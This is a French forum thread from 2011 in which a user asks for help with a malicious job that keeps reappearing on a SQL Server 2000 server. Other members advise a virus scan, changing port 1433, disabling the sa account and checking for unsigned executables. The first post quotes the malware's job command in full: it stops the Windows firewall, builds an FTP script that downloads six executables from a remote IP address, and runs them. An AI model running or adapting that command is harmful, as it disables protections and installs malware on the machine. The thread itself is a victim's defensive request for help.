problème Sql server 2000 [Résolu]

daouame · 12/01/2011, 11h41

Bonjour

j ai remarqué la création dans mon serveur d'un Job Bizzar avec la commande suivante :

Citation:

cmd /c "sc config SQLSERVERAGENT start= AUTO&net1 stop sharedaccess&echo open 122.224.54.14> cmd.txt&echo 1433>> cmd.txt&echo donw>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo get 2.exe >> cmd.txt&echo get 3.exe >> cmd.txt&echo get 4.exe >> cmd.txt&echo get 5.exe >> cmd.txt&echo get 6.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1.exe&2.exe&3.exe&4.exe&5.exe&6.exe&del cmd.txt /q /f&exit"

je crois que c'est un virus qui fait ça prière m'aider à trouver une solution.

elsuket · 12/01/2011, 15h04

Bonjour,

Non, en fait l'instruction sc permet de communiquer en ligne de commande des instructions de configuration à un service Windows.
Le service SQL Server Agent est le planificateur de tâches de SQL Server.

Pour aller plus loin et savoir ce que fait cette instruction, ouvrez un invite de commandes DOS et tapez sc /?

@++

daouame · 13/01/2011, 17h27

merci elsuket
mais après il y a une ouverture d'un site distant open 122.224.54.14
il y a aussi le téléchargement des fichiers (2.exe,3.exe ..)

get 2.exe >> cmd.txt&echo get 3.exe >> cmd.txt

Je supprime ce JOB après il se crée automatiquement il y a un spyware qui utilise le port 1433 echo 1433>> cmd.txt

prière m'aider comment bloquer la création de ce Job.

mikedavem · 13/01/2011, 18h16

Commencez par faire une bonne analyse antivirus et un bon nettoyage de votre serveur. Il me semble de mémoire que c'est un virus qui exploite une faille SQL Server 2000.

++

daouame · 14/01/2011, 10h20

Merci mikedavem

j ai déjà réinstallé l'OS et restauré les DBs mais dés qu'il y a une connexion de

l'extérieur à la base(sync avec des bases PDA) le virus réapparait ,je pense à

changer le port 1433 de sql server est ce que ce changement peut me créer

des problèmes ?

Je pense aussi à installer sp4 de sql server (sp3 maintenant).

est ce qu'il y a d'autres étapes à suivre ?

Merci

dbaffaleuf · 16/01/2011, 12h19

- Effectivement il faut changer le port, la plupart des portscanners connaissent le 1433. Par contre, ça t'obligera peut être à créer des alias côté client, je ne peux pas vérifier.
- Est-ce qu'il y a un FW devant le SQL Server ?
- Je désactiverai le compte sa, et je créerai un compte sysadmin avec un nom particulier.
- Tu peux utiliser ProcessExplorer de sysinternals (http://technet.microsoft.com/en-us/s...rnals/bb896653) pour détecter les exe qui ne sont pas signés, c'est le cas de la plupart des spywares.
- Vérifier que la base de signature de l'AV est à jour.

daouame · 27/01/2011, 10h29

Merci dbaffaleuf

j ai changé le Port 1433 ce qui a entrainé des changements sur Le NAT et d'autres au niveau des applications client

le virus n'a pas apparu

Merci elsuket,mikedavem,dbaffaleuf

12/01/2011, 15h04	#2
elsuket Modérateur Nicolas Souquet Administrateur de base de données Inscription : janvier 2005 Messages : 4 665 Détails du profil Informations personnelles : Nom : Nicolas Souquet Âge : 30 Localisation : Thaïlande Informations professionnelles : Activité : Administrateur de base de données Secteur : High Tech - Éditeur de logiciels Informations forums : Inscription : janvier 2005 Messages : 4 665 Points : 8 707 Points : 8 707	Bonjour, Non, en fait l'instruction sc permet de communiquer en ligne de commande des instructions de configuration à un service Windows. Le service SQL Server Agent est le planificateur de tâches de SQL Server. Pour aller plus loin et savoir ce que fait cette instruction, ouvrez un invite de commandes DOS et tapez sc /? @++ __________________ En bases de données relationnelles SQL, il n'y a ni tableaux, ni enregistrements, ni champs: il y a des tables, des lignes et des colonnes. Blog \| Profil\| Consulter ou télécharger les fichiers d'aide de SQL Server, des versions 2000 à 2012
	00

13/01/2011, 18h16	#4
mikedavem Responsable SQL Server David BARBARIN Expert SQL Server Inscription : août 2005 Messages : 3 723 Détails du profil Informations personnelles : Nom : David BARBARIN Localisation : France, Haute Savoie (Rhône Alpes) Informations professionnelles : Activité : Expert SQL Server Secteur : Conseil Informations forums : Inscription : août 2005 Messages : 3 723 Points : 6 844 Points : 6 844	Commencez par faire une bonne analyse antivirus et un bon nettoyage de votre serveur. Il me semble de mémoire que c'est un virus qui exploite une faille SQL Server 2000. ++ __________________ Blog \| Articles SQL Server \| TSQL Challenges \| English blog
	00

16/01/2011, 12h19	#6
dbaffaleuf Membre chevronné David BAFFALEUF Inscription : février 2008 Messages : 612 Détails du profil Informations personnelles : Nom : David BAFFALEUF Localisation : France Informations forums : Inscription : février 2008 Messages : 612 Points : 744 Points : 744	- Effectivement il faut changer le port, la plupart des portscanners connaissent le 1433. Par contre, ça t'obligera peut être à créer des alias côté client, je ne peux pas vérifier. - Est-ce qu'il y a un FW devant le SQL Server ? - Je désactiverai le compte sa, et je créerai un compte sysadmin avec un nom particulier. - Tu peux utiliser ProcessExplorer de sysinternals (http://technet.microsoft.com/en-us/s...rnals/bb896653) pour détecter les exe qui ne sont pas signés, c'est le cas de la plupart des spywares. - Vérifier que la base de signature de l'AV est à jour. __________________ David B.
	00

13/01/2011, 17h27	#3
daouame Invité régulier Inscription : décembre 2006 Messages : 12 Détails du profil Informations personnelles : Âge : 38 Informations forums : Inscription : décembre 2006 Messages : 12 Points : 5 Points : 5	merci elsuket mais après il y a une ouverture d'un site distant open 122.224.54.14 il y a aussi le téléchargement des fichiers (2.exe,3.exe ..) get 2.exe >> cmd.txt&echo get 3.exe >> cmd.txt Je supprime ce JOB après il se crée automatiquement il y a un spyware qui utilise le port 1433 echo 1433>> cmd.txt prière m'aider comment bloquer la création de ce Job.
	00

14/01/2011, 10h20	#5
daouame Invité régulier Inscription : décembre 2006 Messages : 12 Détails du profil Informations personnelles : Âge : 38 Informations forums : Inscription : décembre 2006 Messages : 12 Points : 5 Points : 5	Merci mikedavem j ai déjà réinstallé l'OS et restauré les DBs mais dés qu'il y a une connexion de l'extérieur à la base(sync avec des bases PDA) le virus réapparait ,je pense à changer le port 1433 de sql server est ce que ce changement peut me créer des problèmes ? Je pense aussi à installer sp4 de sql server (sp3 maintenant). est ce qu'il y a d'autres étapes à suivre ? Merci
	00

27/01/2011, 10h29	#7
daouame Invité régulier Inscription : décembre 2006 Messages : 12 Détails du profil Informations personnelles : Âge : 38 Informations forums : Inscription : décembre 2006 Messages : 12 Points : 5 Points : 5	Merci dbaffaleuf j ai changé le Port 1433 ce qui a entrainé des changements sur Le NAT et d'autres au niveau des applications client le virus n'a pas apparu Merci elsuket,mikedavem,dbaffaleuf
	00

Outils de la discussion
Afficher une version imprimable Envoyer un lien vers cette page par email